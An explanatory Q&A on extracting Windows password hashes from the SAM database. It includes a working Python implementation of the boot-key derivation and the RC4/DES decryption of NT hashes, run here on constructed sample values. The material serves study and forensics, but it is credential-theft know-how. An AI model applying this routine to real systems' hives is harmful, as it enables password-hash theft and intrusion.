What is the underlying principle behind extracting hashes from the SAM database?
The process has two steps. First, recover the boot key (syskey) from `HKLM\SYSTEM`: it is not stored as a registry value but split across the class names of the `JD`, `Skew1`, `GBG` and `Data` keys under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`, which are concatenated in that order and then byte-permuted. Second, use that boot key to unlock `HKLM\SAM`: the `F` value under `HKLM\SAM\SAM\Domains\Account` holds the encrypted SAM key (the "hashed boot key"), and the `V` value under `HKLM\SAM\SAM\Domains\Account\Users\<RID>` holds each user's encrypted LM/NT hash, protected with keys derived from that SAM key and the user's RID. Because the key material is split across the two hives, a copy of `SAM` on its own yields nothing; `SYSTEM` is needed as well, and both hives are readable only with administrator/SYSTEM privileges on a live host or from an offline copy of the disk or a backup. Windows 10 1607 and later replaced the RC4 layers with AES, but the two-hive principle is unchanged. The full cryptographic logic is referenced in the code of tools like mimikatz and quarkspwdump, as outlined in Penetration Techniques - Obtaining Local User Hashes via SAM Database.
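As an added, self-contained illustration of this two-step chain (example code written for this page, not code from mimikatz, quarkspwdump or the referenced article): it implements the pre-Windows 10 1607 variant (revision 1, RC4 plus DES) in pure Python, with the constants, offsets and permutation as they appear in the open-source reference implementations (creddump, impacket's secretsdump). The class names, salt and SAM key below are constructed sample values, not data from a real hive; `build_sample_f` assembles an `F` blob from them so that the decryption routine has realistic input to work on. Reading the hives themselves (live registry API or an offline hive parser) is out of scope, and `pycryptodome` is assumed only for the final DES step in `decrypt_nt_hash`, which nothing else in the block depends on.

```python
import hashlib
import struct

# Constants baked into the SAM decryption routine (identical in every public implementation).
QWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = b"0123456789012345678901234567890123456789\0"
NTPASSWORD = b"NTPASSWORD\0"
# Byte permutation applied to the 16 concatenated class-name bytes to obtain the boot key.
BOOTKEY_PERMUTATION = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), dependency-free so the block runs offline."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def derive_bootkey(class_names: dict) -> bytes:
    """Step 1: the boot key is split across the *class names* (not values) of HKLM\\SYSTEM\\
    <CurrentControlSet>\\Control\\Lsa\\{JD,Skew1,GBG,Data}: four 8-hex-char strings, concatenated and permuted."""
    raw = bytes.fromhex("".join(class_names[k] for k in ("JD", "Skew1", "GBG", "Data")))
    return bytes(raw[p] for p in BOOTKEY_PERMUTATION)

def verify_hashed_bootkey(hbootkey: bytes) -> bool:
    """Bytes 16..31 of the decrypted SAM key data are an MD5 checksum over bytes 0..15;
    a mismatch means the boot key (i.e. the SYSTEM hive) does not belong to this SAM."""
    return hbootkey[16:32] == hashlib.md5(hbootkey[:16] + DIGITS + hbootkey[:16] + QWERTY).digest()

def get_hashed_bootkey(f_value: bytes, bootkey: bytes) -> bytes:
    """Step 2a: decrypt the SAM key data held in HKLM\\SAM\\SAM\\Domains\\Account\\F
    (at offset 0x68: Revision, Length, Salt[16], Key[16], CheckSum[16])."""
    (revision,) = struct.unpack_from("<L", f_value, 0x68)
    if revision != 1:
        # Revision 2 (Windows 10 1607 and later) swaps RC4 for AES-128-CBC (boot key as key,
        # salt as IV); that path needs an AES library and is left out of this example.
        raise NotImplementedError("SAM key data revision %d: only revision 1 (RC4) is handled" % revision)
    rc4_key = hashlib.md5(f_value[0x70:0x80] + QWERTY + bootkey + DIGITS).digest()
    hbootkey = rc4(rc4_key, f_value[0x80:0xA0])
    if not verify_hashed_bootkey(hbootkey):
        raise ValueError("checksum mismatch: wrong boot key, or SYSTEM and SAM come from different machines")
    return hbootkey

def _to_des_key(s7: bytes) -> bytes:
    """Expand 7 bytes into an 8-byte DES key: 7-bit chunks, MSB first, each shifted left one
    bit, with the low bit set where needed so that every key byte has odd parity."""
    n, key = int.from_bytes(s7, "big"), bytearray()
    for i in range(8):
        b = ((n >> (49 - 7 * i)) & 0x7F) << 1
        key.append(b | 1 if bin(b).count("1") % 2 == 0 else b)
    return bytes(key)

def rid_to_des_keys(rid: int) -> tuple:
    """Step 2b: the two DES keys protecting a user's hash are derived from the RID alone."""
    s1 = (struct.pack("<L", rid) * 2)[:7]        # rid bytes (LE) followed by its first 3 bytes
    s2 = ((s1[3:4] + s1[:3]) * 2)[:7]            # rotated variant, same padding rule
    return _to_des_key(s1), _to_des_key(s2)

def decrypt_nt_hash(hbootkey: bytes, rid: int, enc_hash: bytes) -> bytes:
    """Step 2c: peel both layers off the 16 encrypted NT hash bytes read from the user's V value
    (revision 1: found via the offset stored at V[0xA8] plus 0xCC, after a 4-byte header).
    RC4 keyed from hbootkey + RID comes off first, then DES-ECB per 8-byte half (pycryptodome assumed)."""
    try:
        from Crypto.Cipher import DES
    except ImportError as exc:
        raise RuntimeError("pycryptodome is required for the final DES step") from exc
    obf = rc4(hashlib.md5(hbootkey[:16] + struct.pack("<L", rid) + NTPASSWORD).digest(), enc_hash)
    k1, k2 = rid_to_des_keys(rid)
    return DES.new(k1, DES.MODE_ECB).decrypt(obf[:8]) + DES.new(k2, DES.MODE_ECB).decrypt(obf[8:])

# ---- Constructed sample input (not taken from any real system) ----
SAMPLE_CLASS_NAMES = {"JD": "00010203", "Skew1": "04050607", "GBG": "08090a0b", "Data": "0c0d0e0f"}
SAMPLE_HBOOTKEY = bytes(range(0x10, 0x20))  # plaintext SAM key the decryption should recover
SAMPLE_SALT = bytes.fromhex("a5" * 16)

def build_sample_f(bootkey: bytes, hbootkey_plain: bytes, salt: bytes) -> bytes:
    """Build a 0xA0-byte F blob carrying hbootkey_plain||checksum encrypted exactly as a
    revision-1 Windows would store it, so get_hashed_bootkey has a realistic input."""
    checksum = hashlib.md5(hbootkey_plain + DIGITS + hbootkey_plain + QWERTY).digest()
    rc4_key = hashlib.md5(salt + QWERTY + bootkey + DIGITS).digest()
    f = bytearray(0xA0)
    struct.pack_into("<LL", f, 0x68, 1, 0x38)  # Revision = 1 (RC4); Length is not used here
    f[0x70:0x80] = salt
    f[0x80:0xA0] = rc4(rc4_key, hbootkey_plain + checksum)
    return bytes(f)

SAMPLE_BOOTKEY = derive_bootkey(SAMPLE_CLASS_NAMES)
SAMPLE_F = build_sample_f(SAMPLE_BOOTKEY, SAMPLE_HBOOTKEY, SAMPLE_SALT)

if __name__ == "__main__":
    print("boot key:", SAMPLE_BOOTKEY.hex(), " hashed boot key:", get_hashed_bootkey(SAMPLE_F, SAMPLE_BOOTKEY)[:16].hex())
    print("RID 500 DES keys:", *(k.hex() for k in rid_to_des_keys(500)))
```

On a live host the class names come from each key's class string (what `RegQueryInfoKey` returns), not from its values, and the control set to read is named by `HKLM\SYSTEM\Select\Current`. The checksum test inside `get_hashed_bootkey` is the quickest way to confirm that a `SYSTEM`/`SAM` pair actually belong together before trying any user hash; against a Windows 10 1607 or later hive the code stops with `NotImplementedError` because the key data is revision 2 (AES), while the two-hive principle it demonstrates is unchanged.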